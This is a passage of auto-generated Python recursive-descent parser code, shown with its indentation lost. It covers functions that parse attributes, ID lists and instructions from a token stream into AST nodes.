_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = parse_IDs(prim__state, prim__tokens)
_slot_1_check = lcl_3
lcl_3 = _slot_1_check[0]
lcl_3 = (lcl_3 is False)
if lcl_3:
lcl_3 = _slot_1_check
else:
lcl_4 = _slot_1_check[1]
lcl_4 = lcl_4
_slot_1 = lcl_4
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Attr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
else:
lcl_3 = (_off_0, 'Attr lookahead failed')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_1 = lcl_3
lcl_0 = lcl_1
else:
lcl_1 = (_off_0, 'Attr got EOF')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
return lcl_0
def parse_Attrs(prim__state, prim__tokens):
lcl_0 = parse_Attr(prim__state, prim__tokens)
_slot_0_check = lcl_0
lcl_0 = _slot_0_check[0]
lcl_0 = (lcl_0 is False)
if lcl_0:
lcl_0 = _slot_0_check
else:
lcl_1 = _slot_0_check[1]
lcl_1 = lcl_1
_slot_0 = lcl_1
lcl_1 = (_slot_0,)
lcl_1 = prim__mk__ast('Attrs', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = lr_loop_Attrs(_slot_local__1, prim__state, prim__tokens)
lcl_0 = lcl_1
return lcl_0
def parse_IDList(prim__state, prim__tokens):
lcl_0 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_0):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_0 = _py_local_tk
_slot_0 = lcl_0
lcl_0 = (_slot_0 is None)
if lcl_0:
lcl_1 = prim__tokens.offset
lcl_1 = (lcl_1, 'ID not match')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
else:
lcl_1 = (_slot_0,)
lcl_1 = prim__mk__ast('IDList', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = lr_loop_IDList(_slot_local__1, prim__state, prim__tokens)
lcl_0 = lcl_1
return lcl_0
def parse_IDs(prim__state, prim__tokens):
lcl_0 = 40
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_0):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_0 = _py_local_tk
_slot_0 = lcl_0
lcl_0 = (_slot_0 is None)
if lcl_0:
lcl_1 = prim__tokens.offset
lcl_1 = (lcl_1, 'quote [ not match')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
else:
lcl_1 = prim__tokens.offset
_off_1 = lcl_1
lcl_1 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_1:
lcl_3 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_3 = lcl_3.idint
if (lcl_3 == 41):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_4 = _py_local_t
_slot_1 = lcl_4
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('IDs', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_2 = lcl_4
elif (lcl_3 == 44):
lcl_4 = parse_IDList(prim__state, prim__tokens)
_slot_1_check = lcl_4
lcl_4 = _slot_1_check[0]
lcl_4 = (lcl_4 is False)
if lcl_4:
lcl_4 = _slot_1_check
else:
lcl_5 = _slot_1_check[1]
lcl_5 = lcl_5
_slot_1 = lcl_5
lcl_5 = 41
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_5):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_5 = _py_local_tk
_slot_2 = lcl_5
lcl_5 = (_slot_2 is None)
if lcl_5:
lcl_6 = prim__tokens.offset
lcl_6 = (lcl_6, 'quote ] not match')
lcl_6 = prim__cons(lcl_6, prim__nil)
lcl_6 = lcl_6
lcl_6 = (False, lcl_6)
lcl_5 = lcl_6
else:
lcl_6 = (_slot_0, _slot_1, _slot_2)
lcl_6 = prim__mk__ast('IDs', lcl_6)
_slot_local__1 = lcl_6
lcl_6 = (True, _slot_local__1)
lcl_5 = lcl_6
lcl_4 = lcl_5
lcl_2 = lcl_4
else:
lcl_4 = (_off_1, 'IDs lookahead failed')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_2 = lcl_4
lcl_1 = lcl_2
else:
lcl_2 = (_off_1, 'IDs got EOF')
lcl_2 = prim__cons(lcl_2, prim__nil)
lcl_2 = lcl_2
lcl_2 = (False, lcl_2)
lcl_1 = lcl_2
lcl_0 = lcl_1
return lcl_0
def parse_Instr(prim__state, prim__tokens):
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_0:
lcl_2 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_2 = lcl_2.idint
if (lcl_2 == 24):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 30):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = prim__tokens.offset
_off_1 = lcl_3
lcl_3 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_3:
lcl_5 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_5 = lcl_5.idint
if (lcl_5 == 31):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_6 = _py_local_t
_slot_1 = lcl_6
lcl_6 = parse_JumpCases(prim__state, prim__tokens)
_slot_2_check = lcl_6
lcl_6 = _slot_2_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_2_check
else:
lcl_7 = _slot_2_check[1]
lcl_7 = lcl_7
_slot_2 = lcl_7
lcl_7 = (_slot_0, _slot_1, _slot_2)
lcl_7 = prim__mk__ast('Instr', lcl_7)
_slot_local__1 = lcl_7
lcl_7 = (True, _slot_local__1)
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 33):
lcl_6 = parse_JumpCases(prim__state, prim__tokens)
_slot_1_check = lcl_6
lcl_6 = _slot_1_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_1_check
else:
lcl_7 = _slot_1_check[1]
lcl_7 = lcl_7
_slot_1 = lcl_7
lcl_7 = (_slot_0, _slot_1)
lcl_7 = prim__mk__ast('Instr', lcl_7)
_slot_local__1 = lcl_7
lcl_7 = (True, _slot_local__1)
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 43):
lcl_6 = parse_JumpCases(prim__state, prim__tokens)
_slot_1_check = lcl_6
lcl_6 = _slot_1_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_1_check
else:
lcl_7 = _slot_1_check[1]
lcl_7 = lcl_7
_slot_1 = lcl_7
lcl_7 = (_slot_0, _slot_1)
lcl_7 = prim__mk__ast('Instr', lcl_7)
_slot_local__1 = lcl_7
lcl_7 = (True, _slot_local__1)
lcl_6 = lcl_7
lcl_4 = lcl_6
else:
lcl_6 = (_off_1, 'Instr lookahead failed')
lcl_6 = prim__cons(lcl_6, prim__nil)
lcl_6 = lcl_6
lcl_6 = (False, lcl_6)
lcl_4 = lcl_6
lcl_3 = lcl_4
else:
lcl_4 = (_off_1, 'Instr got EOF')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 4):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 15):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 25):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 13):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 12):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 10):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 11):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 3):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 23):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 26):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 20):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 14):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 19):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 18):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 17):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 9):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 8):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 42
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'PY not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 16):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 6):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 5):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 27):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = prim__tokens.offset
_off_1 = lcl_3
lcl_3 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_3:
lcl_5 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_5 = lcl_5.idint
if (lcl_5 == 28):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_6 = _py_local_t
_slot_1 = lcl_6
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_2_check = lcl_6
lcl_6 = _slot_2_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_2_check
else:
lcl_7 = _slot_2_check[1]
lcl_7 = lcl_7
_slot_2 = lcl_7
lcl_7 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_3 = lcl_7
lcl_7 = (_slot_3 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'quote } not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3)
lcl_8 = prim__mk__ast('Instr', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 37):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_6
lcl_6 = _slot_1_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_1_check
else:
lcl_7 = _slot_1_check[1]
lcl_7 = lcl_7
_slot_1 = lcl_7
lcl_7 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_2 = lcl_7
lcl_7 = (_slot_2 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'quote { not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_8
lcl_8 = _slot_3_check[0]
lcl_8 = (lcl_8 is False)
if lcl_8:
lcl_8 = _slot_3_check
else:
lcl_9 = _slot_3_check[1]
lcl_9 = lcl_9
_slot_3 = lcl_9
lcl_9 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_9):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_9 = _py_local_tk
_slot_4 = lcl_9
lcl_9 = (_slot_4 is None)
if lcl_9:
lcl_10 = prim__tokens.offset
lcl_10 = (lcl_10, 'quote } not match')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_9 = lcl_10
else:
lcl_10 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_10 = prim__mk__ast('Instr', lcl_10)
_slot_local__1 = lcl_10
lcl_10 = (True, _slot_local__1)
lcl_9 = lcl_10
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 36):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
